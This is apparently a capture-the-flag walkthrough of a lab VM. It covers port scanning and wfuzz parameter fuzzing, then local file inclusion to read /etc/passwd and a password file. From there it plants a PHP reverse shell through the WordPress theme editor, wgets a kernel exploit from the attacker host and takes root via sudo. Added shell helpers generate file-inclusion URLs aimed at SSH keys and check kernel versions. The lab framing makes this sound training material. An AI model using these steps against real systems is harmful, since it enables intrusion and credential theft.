Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-17 06:04 EDT
Nmap scan report for ubuntu (192.168.1.113)
Host is up (0.00013s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8d:c5:20:23:ab:10:ca:de:e2:fb:e5:cd:4d:2d:4d:72 (RSA)
| 256 94:9c:f8:6f:5c:f1:4c:11:95:7f:0a:2c:34:76:50:0b (ECDSA)
|_ 256 4b:f6:f1:25:b6:13:26:d4:fc:9e:b0:72:9f:f4:69:68 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: HacknPentest
MAC Address: 00:0C:29:B5:6E:B3 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.35 seconds
Let's open the IP in a browser and see what we have.
Nothing much, so let's use dirb to enumerate directories.
dirb
Let's navigate to /dev and see what we get.
Next, we run dirb again, this time with -X .txt so that it only looks for files ending in .txt.
We get a file called secret.txt.
Inside it is a link to a page describing the technique we need next, called fuzzing.
Fuzzing
wfuzz
We first run wfuzz with no filter to learn the word count of the baseline response (the unfiltered output is shown further down the page).
As we can see, every baseline response has 12 words, so we add --hw 12, which hides every response whose word count is 12.
Then we run wfuzz again with that filter.
Only one payload survives, so we know there is a parameter called file. We go back to index.php and append ?file=location.txt, the file name that secret.txt pointed us to.
The response gives us the string secrettier360 and says to try it on another php page, so let's use gobuster to enumerate further.
gobuster
As we can see, we have another php file called image.php.
Let's use wfuzz again and repeat the steps above, first finding the baseline word count.
This time it is 17 words, so we set --hw 17.
The only payload left is dev, so let's supply it in the URL.
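Both wfuzz runs above follow the same pattern: run once unfiltered, read the word count that almost every response shares, then rerun with --hw set to that number and look at what is left. The POSIX sh helpers below are an added example, not code from the write-up: they compute that baseline from wfuzz's table output and list the payloads that differ, so the choice of 12 and 17 is no longer done by eye. The two embedded excerpts are constructed from the rows printed on this page, and the wordlist path in the generated command is an assumption.

```shell
#!/bin/sh
# Added example: derive the --hw value from an unfiltered wfuzz run and
# list the payloads whose response differs from the baseline.

# Constructed excerpts of the two unfiltered runs shown on this page
# (wfuzz 2.4.5 columns: ID, Response, Lines, Words, Chars, Payload).
INDEX_RUN='000000001:   200        7 L      12 W       136 Ch      "@"
000000002:   200        7 L      12 W       136 Ch      "00"
000000006:   200        7 L      12 W       136 Ch      "1"
000000340:   200        7 L      19 W       206 Ch      "file"'

IMAGE_RUN='000000001:   200        6 L      17 W       197 Ch      "@"
000000012:   200        6 L      17 W       197 Ch      "20"
000000014:   200        6 L      17 W       197 Ch      "2000"
000000256:   200       13 L      43 W       328 Ch      "dev"'

# The word count shared by most result rows; this is the value for --hw.
baseline_words() {
  printf '%s\n' "$1" | awk '
    /^[0-9]+:/ { count[$5]++ }
    END {
      best = ""; max = 0
      for (w in count) if (count[w] > max) { max = count[w]; best = w }
      print best
    }'
}

# Payloads whose response did not have the baseline word count.
outliers() {
  hw=$(baseline_words "$1")
  printf '%s\n' "$1" | awk -v hw="$hw" '
    /^[0-9]+:/ && $5 != hw { gsub(/"/, "", $9); print $9 }'
}

# The second wfuzz command line, with --hw filled in from the first run.
# The wordlist path is an assumption (Kali's wfuzz package location).
wfuzz_hw_cmd() {
  url="$1"; wordlist="$2"; hw=$(baseline_words "$3")
  printf 'wfuzz -c -w %s --hw %s %s\n' "$wordlist" "$hw" "$url"
}

# Stand-alone demo over both constructed runs.
for run in "$INDEX_RUN" "$IMAGE_RUN"; do
  echo "baseline --hw $(baseline_words "$run"); outliers: $(outliers "$run" | tr '\n' ' ')"
done
wfuzz_hw_cmd 'http://192.168.1.113/index.php?FUZZ=something' \
  /usr/share/wfuzz/wordlist/general/common.txt "$INDEX_RUN"
```

Taking the most common word count works because the baseline dominates the table; if a target returns variable-length error pages, filter on characters with --hh instead, or on both, since a parameter that changes the page by a single word would otherwise be hidden.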
Next, we can replace dev with /etc/passwd. The file comes back, so the parameter includes arbitrary local files.
The /etc/passwd output mentions a password.txt in /home/saket, so let's replace /etc/passwd with /home/saket/password.txt.
We get a password: follow_the_ippsec.
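Once a parameter reads /etc/passwd, the next step is to use it to pick follow-up targets rather than guessing paths. The script below is an added example, not part of the write-up: it parses a passwd file for accounts with a real login shell and emits one URL per home-directory file for the secrettier360 parameter. The passwd excerpt is constructed for the demo; password.txt is the file this box hints at, the other two names are common post-inclusion targets.

```shell
#!/bin/sh
# Added example: turn an /etc/passwd read through the LFI parameter into
# a list of follow-up URLs for each user's home directory.

# Constructed /etc/passwd excerpt standing in for what the box returned.
PASSWD_SAMPLE='root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
victor:x:1000:1000:victor,,,:/home/victor:/bin/bash
saket:x:1001:1001:,,,:/home/saket:/bin/bash'

# Base URL with the vulnerable parameter; the file path is appended verbatim.
LFI_BASE='http://192.168.1.113/image.php?secrettier360='

# Files to try in every home directory. password.txt is this box's hint;
# .bash_history and .ssh/id_rsa are the usual next reads after an LFI.
HOME_FILES='password.txt .bash_history .ssh/id_rsa'

# Accounts with a real login shell, printed as "user:home" lines.
login_users() {
  printf '%s\n' "$1" | awk -F: '$7 !~ /(nologin|false)$/ && $6 != "" { print $1 ":" $6 }'
}

# One URL per (user, file) pair for the LFI parameter.
lfi_targets() {
  base="$1"; passwd="$2"
  login_users "$passwd" | while IFS=: read -r user home; do
    for f in $HOME_FILES; do
      printf '%s%s/%s\n' "$base" "$home" "$f"
    done
  done
}

# Stand-alone demo over the constructed passwd excerpt.
lfi_targets "$LFI_BASE" "$PASSWD_SAMPLE"
```

Feed the printed URLs to curl one at a time and compare each response against the size of a known-missing file: as with wfuzz above, a hit is a response whose length differs from the baseline, not merely a 200 status, because image.php returns 200 either way.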
Reverse Shell
Enumeration also turned up a WordPress site under /wordpress.
We go to its login page and try username victor (one of the users listed in /etc/passwd) with the password follow_the_ippsec.
We are logged into the admin panel.
After looking around, we go to Appearance and then Theme Editor.
On the right side there is a php file called secret.php, and it is writable, so we can replace its contents with our own PHP.
We grab the PHP reverse shell from pentestmonkey.
Paste the whole file into the editor in place of secret.php, change the IP and port to point at our machine, then click Update File.
Before triggering it, we start a listener on our machine on that port.
Then, in the browser, navigate to /wordpress/wp-content/themes/twentynineteen/secret.php.
We get a shell!
Privilege Escalation
Navigate to /home/saket and read the user flag.
Method 1
Copy the kernel exploit source, 45010.c (from Exploit-DB), to our current directory.
Then, on our machine, we serve that directory with Python's built-in HTTP server on port 8000.
In the target shell, change to the /tmp directory.
Then download the file with wget 192.168.1.112:8000/45010.c
After that, compile it with gcc 45010.c -o exploit
Then chmod +x exploit (gcc already marks its output executable, so this step is harmless but not needed).
Run the exploit with ./exploit
Type /bin/bash -i to get a proper interactive shell.
Navigate to /root and cat root.txt to get the flag.
Congratulations!
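Method 1 compiles and runs a kernel exploit on the target, and a wrong-kernel attempt can panic the box instead of giving a shell. The check a practitioner wants first is whether uname -r even falls in the exploit's affected range. The helper below is an added example, not part of the write-up: a POSIX sh version comparison that treats Ubuntu's 4.4.0-116-generic style strings correctly. Exploit-DB lists 45010 for kernels before 4.13.9; the 4.4.0 lower bound used here is an assumption for illustration. Distro kernels carry backported fixes, so a match is a reason to read the exploit's header and the distro changelog, not proof that it will work.

```shell
#!/bin/sh
# Added example: check the running kernel against a version range before
# compiling and running a kernel exploit on the target.

# Compare two version strings component-wise; dots and dashes both split,
# and non-numeric parts such as "generic" count as 0. Prints lt, eq or gt.
vercmp() {
  awk -v a="$1" -v b="$2" 'BEGIN {
    n = split(a, x, "[.-]"); m = split(b, y, "[.-]")
    k = (n > m) ? n : m
    for (i = 1; i <= k; i++) {
      xi = (i <= n) ? x[i] + 0 : 0
      yi = (i <= m) ? y[i] + 0 : 0
      if (xi < yi) { print "lt"; exit }
      if (xi > yi) { print "gt"; exit }
    }
    print "eq"
  }'
}

# Succeed when lo <= version < hi.
kernel_in_range() {
  ver="$1"; lo="$2"; hi="$3"
  [ "$(vercmp "$ver" "$lo")" != "lt" ] && [ "$(vercmp "$ver" "$hi")" = "lt" ]
}

# Stand-alone demo: 4.13.9 is Exploit-DB's upper bound for 45010, and
# 4.4.0 is an assumed lower bound for illustration.
if kernel_in_range "$(uname -r)" "4.4.0" "4.13.9"; then
  echo "kernel $(uname -r) is inside the range; worth reading the exploit header"
else
  echo "kernel $(uname -r) is outside the range; do not run the exploit"
fi
```

On Ubuntu the upstream number stays at 4.4.0 for the whole 16.04 series while the -NNN build number climbs, so after this coarse check compare the build number against the one named in the exploit's comments before trusting a "vulnerable" verdict.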
Method 2
Type sudo -l and we get the following.
Navigate to /home/saket and we see an executable file called enc.
Running it does nothing obvious. After further enumeration, we find /opt/backup/server_database, which holds a backup password.
Navigate back to the directory containing enc and run it with sudo ./enc, giving it the backup password.
We get two files, enc.txt and key.txt.
The key file tells us to use the MD5 hash of the string ippsec as the key, so we first compute that hash.
With that key and this tool, I recover the plaintext of enc.txt:
Dont worry saket one day we will reach toour destination very soon. And if you forget your username then use your old password==> "tribute_to_ippsec"Victor,
The password is tribute_to_ippsec, so let's su to the saket user.
Then type sudo -l again.
Navigate to victor's directory and run sudo /home/victor/undefeated_victor
It turns out there is no bash available for the user victor, so we type
so that we get a shell as victor.
Run sudo /home/victor/undefeated_victor again.
Got root!
Navigate to /root and cat root.txt to get the flag!
wfuzz output for index.php, first unfiltered and then with --hw 12:
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************
Target: http://192.168.1.113/index.php?FUZZ=something
Total requests: 949
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000001: 200 7 L 12 W 136 Ch "@"
000000002: 200 7 L 12 W 136 Ch "00"
000000003: 200 7 L 12 W 136 Ch "01"
000000004: 200 7 L 12 W 136 Ch "02"
000000005: 200 7 L 12 W 136 Ch "03"
000000006: 200 7 L 12 W 136 Ch "1"
000000008: 200 7 L 12 W 136 Ch "100"
000000007: 200 7 L 12 W 136 Ch "10"
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************
Target: http://192.168.1.113/index.php?FUZZ=something
Total requests: 949
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000340: 200 7 L 19 W 206 Ch "file"
Total time: 1.358470
Processed Requests: 949
Filtered Requests: 948
Requests/sec.: 698.5795
gobuster command used to find image.php:
gobuster dir -u http://192.168.1.113/ -w /usr/share/wordlists/dirb/common.txt -x .php
wfuzz output for image.php, first unfiltered and then with --hw 17:
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************
Target: http://192.168.1.113/image.php?secrettier360=FUZZ
Total requests: 949
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000001: 200 6 L 17 W 197 Ch "@"
000000002: 200 6 L 17 W 197 Ch "00"
000000003: 200 6 L 17 W 197 Ch "01"
000000004: 200 6 L 17 W 197 Ch "02"
000000005: 200 6 L 17 W 197 Ch "03"
000000012: 200 6 L 17 W 197 Ch "20"
000000014: 200 6 L 17 W 197 Ch "2000"
000000006: 200 6 L 17 W 197 Ch "1"
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer *
********************************************************
Target: http://192.168.1.113/image.php?secrettier360=FUZZ
Total requests: 949
===================================================================
ID Response Lines Word Chars Payload
===================================================================
000000256: 200 13 L 43 W 328 Ch "dev"
Total time: 1.601662
Processed Requests: 949
Filtered Requests: 948
Requests/sec.: 592.5094